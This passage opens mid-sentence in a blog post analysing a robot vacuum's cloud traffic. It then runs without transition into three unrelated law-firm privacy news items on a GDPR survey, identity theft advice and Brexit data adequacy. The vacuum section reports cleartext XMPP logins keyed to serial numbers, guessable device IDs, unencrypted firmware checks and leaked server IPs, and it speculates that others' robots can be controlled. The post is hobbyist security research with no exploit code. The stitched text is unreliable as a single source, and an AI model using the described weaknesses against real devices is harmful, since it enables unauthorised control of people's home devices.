where it does an HTTPS connect. Hm, maybe thats better than I thought, but the TLS config of the server is bad, but at least it encrypted – so there is still hope.

Looking at the other traffic I saw a XMPP / jabber connection (lbat.ecouser.net / 47.91.78.247), which was encrypted, but sadly with a self signed certificate. I’ll thought I’ll take a look at the traffic via MitM later, lets get it to work before.

Getting it to work
It looks like the robot is creating a SSID for the App on the mobile to connect to, after you pressed the WiFi button >3 sec. So the exchange of the WiFi password seems to secure enough. But it took me almost 1h to get the robot to connect to my IoT network and I didn’t find any information or tips online. I changed following on my side to get it to work, maybe that helps somebody else:

  • I enabled the location stuff (which I’ve disabled by default) on the mobile as I remembered the WiFi Analyser App always tells me to enabled that to sees WiFi networks.
  • I needed to change my IoT network to support legacy WiFi modes. My normal setup is:

    I needed to change it to following in order for the robot to be able to connect:

Robot traffic

The first request from the robot after getting an IP address is to request a HTTP connection to lbo.ecouser.net (47.91.78.247) on Port 8007

Hey we know the IP address and port – that’s the Jabber server the App also connects to. But before the robot connects to the Jabber server he does a second HTTP request, this time to an IP address (47.88.193.19:8005) and not a DNS name. Thats interesting:

That looks like a check for newer firmware …. firmware updates unencrypted .. what can possible go wrong here. As the request currently returns no new firmware I can’t look at that more closely – something for the future. Checking Shodan Info on that IP address is interesting. It runs a portmapper and ntp server reachable from the internet … someone already using that as DDOS amplifier? I’m not talking about the not configured nginx which also leaks IP addresses in the certificate: IP Address:120.26.244.107, IP Address:121.41.41.198, IP Address:47.88.193.19

Let’s go back to the Jabber server the robot connect to. The App uses a self signed certificate “protected” channel but the robot does connect completely in the clear – thats nice so I don’t need to do a MitM attack. The wireshark trace is so full on information that I’m really not sure what I can show you without making it too easy for you to control my robot.

Following is shown in the screenshot (which shows only a a part of the communication):

  • The logon to the server via PLAIN authentication, which is comprised of
    • username: Is the serial number of the device, which is also printed onto the box the device is sold in.
    • password: Looks like a MD5 hash of something, as its 32 hex chars – something to investigate
  • It shares its online (presence status in jabber terms) with the app
  • It gets asked for a version, I guess the firmware version which it returns as 0.16.46 – hope a thats already stable

Looking at later traffic following requests issued by the app:

  • GetDeviceInfo
  • SetTime
  • GetChargeState
  • GetBatteryInfo
  • GetWKVer
  • GetError
  • GetOnOff
  • GetSched
  • GetLifeSpan

I didn’t control the device via the App otherwise there should be much more commands.

Questions and thoughts

I don’t really see a peering which makes sure that only the right App can control a robot, so it is maybe possible to control other robots. As the user ID used on the Jabber server is just the serial number with @141.ecorobot.net/atom added, it should be ease to guess additional user IDs. There is no need to know the password of the robot. On the other side it should be possible to create your own Jabber server and redirect traffic to it. Also writing a DIY App without all that App permissions should be possible and not to hard. The robot I bought is not so interesting for an attacker as it cannot provide room layouts as the more expensive ones provide. The screenshots of the App show what is possible:

I guess I wait for the next versions of the robots that provide a microphone and/or a camera – than it gets really interesting.

As I was able to configure the schedules via the App and set the time,  I’ll try if that still works if the robot is not able to connect to the Internet. If so I’ll got that route and enable the Internet connection only if I need to change the schedules.

Ps: you should really have a separate IoT network.

CIPL and AvePoint Launch Second Annual GDPR Organizational Readiness Survey

With less than one year to go before the EU General Data Protection Regulation (“GDPR”) comes into force, the Centre for Information Policy Leadership (“CIPL”) at Hunton & Williams and AvePoint have launched the second annual GDPR Organizational Readiness Survey. Last year, over 220 predominantly multinational organizations participated in the study which focused on key areas of impact and change under the GDPR such as consent, legitimate interest, data portability, profiling, DPIAs, DPOs, data transfers and privacy management programs. This year’s study revisits these important areas of impact and further considers additional topics. 

Your organization’s participation in the study will help you to:

  • assess your current state of readiness for the GDPR;
  • benchmark your GDPR readiness in relation to industry peers;
  • gain insight into key changes and compliance obligations under the GDPR; and
  • determine next steps and requirements for your organization’s GDPR preparation plan.

The results, which will be kept anonymous, will be analyzed and used to publish an extensive overview on GDPR readiness, the CIPL & AvePoint Second Annual GDPR Benchmark Report. The report will provide your organization with insight into industry-wide GDPR preparedness levels, GDPR best practices as identified among participants and guidance for those looking to implement changes to their company-wide privacy management programs in anticipation of the GDPR. The report is expected for release in late fall of 2017.

Take the survey by August 31, 2017.*

*We ask that one representative from your organization complete the survey, and encourage you to work with the appropriate individuals in your organization to fill out the survey.

Lisa Sotto Discusses Identity Theft Prevention on Fox TV

On July 27, 2017, Lisa Sotto, chair of Hunton & Williams LLP’s Global Privacy and Cybersecurity practice, appeared live on Washington, DC’s Fox TV to discuss the ID theft issue involving former Dallas Cowboys player Lucky Whitehead, and to warn against the risk of identity theft. Sotto cautions that identity thieves who are determined and looking to do harm “will find [personal data].” According to Sotto, consumers “leave footprints everywhere online.” To mitigate risk of identity theft, Sotto advises against freely providing a Social Security number, shredding bank account statements, using complex passwords and avoiding public WiFi when checking bank accounts.

Watch her live interview.

UK House of Lords Recommends Pursuit of EU Adequacy Decision

On July 18, 2017, the European Union Committee of the UK’s House of Lords published its paper, Brexit: the EU data protection package (the “Paper”). The Paper urges the UK government to make good on its stated aim of maintaining unhindered and uninterrupted data flows between the UK and EU after Brexit, and examines the options available to ensure that this occurs. It warns that data flows have become so valuable to cross-border business that failure to establish an adequate framework could hamper EU-UK trade.

The Paper draws on the advice of a number of prominent UK data protection experts, including Hunton & Williams’ senior consultant attorney Rosemary Jay. The Paper’s main recommendation is that the UK seek to secure an adequacy decision from the European Commission, which would hold that the UK has an equivalent level of data protection safeguards as the EU, and would allow EU-UK data flows to continue without hindrance. As the Paper explains, this may be difficult. In particular, once the UK leaves the EU it will not be able to rely on the national security exemption in the Treaty on the Functioning of the European Union that is currently relied upon when the UK’s data retention and surveillance position is tested in the Court of Justice for the European Union. This effectively means that the UK will be held to a higher standard than EU Member States when its data protection regime is assessed for adequacy, which could cause issues in light of the recent introduction of the UK’s Investigatory Powers Act 2016. The Investigatory Powers Act permits the sort of bulk surveillance activities that were fundamental in invalidating the EU-U.S. Safe Harbor framework for data transfers. Without an adequacy decision, alternative methods of validating cross-border transfers, such as standard contractual clauses and binding corporate rules, will be held as “sub-optimal” and could cause problems for companies offering products and services direct to EU consumers. The House of Lords also calls for data protection to form part of any transitional agreement reached with the EU, asserting that the adequacy process could only begin once the UK has left the EU and would therefore rule out the prospect of the UK immediately being held adequate.